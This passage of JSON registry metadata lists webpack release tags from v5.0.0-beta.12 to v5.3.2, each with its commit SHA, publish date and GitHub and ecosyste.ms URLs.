"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1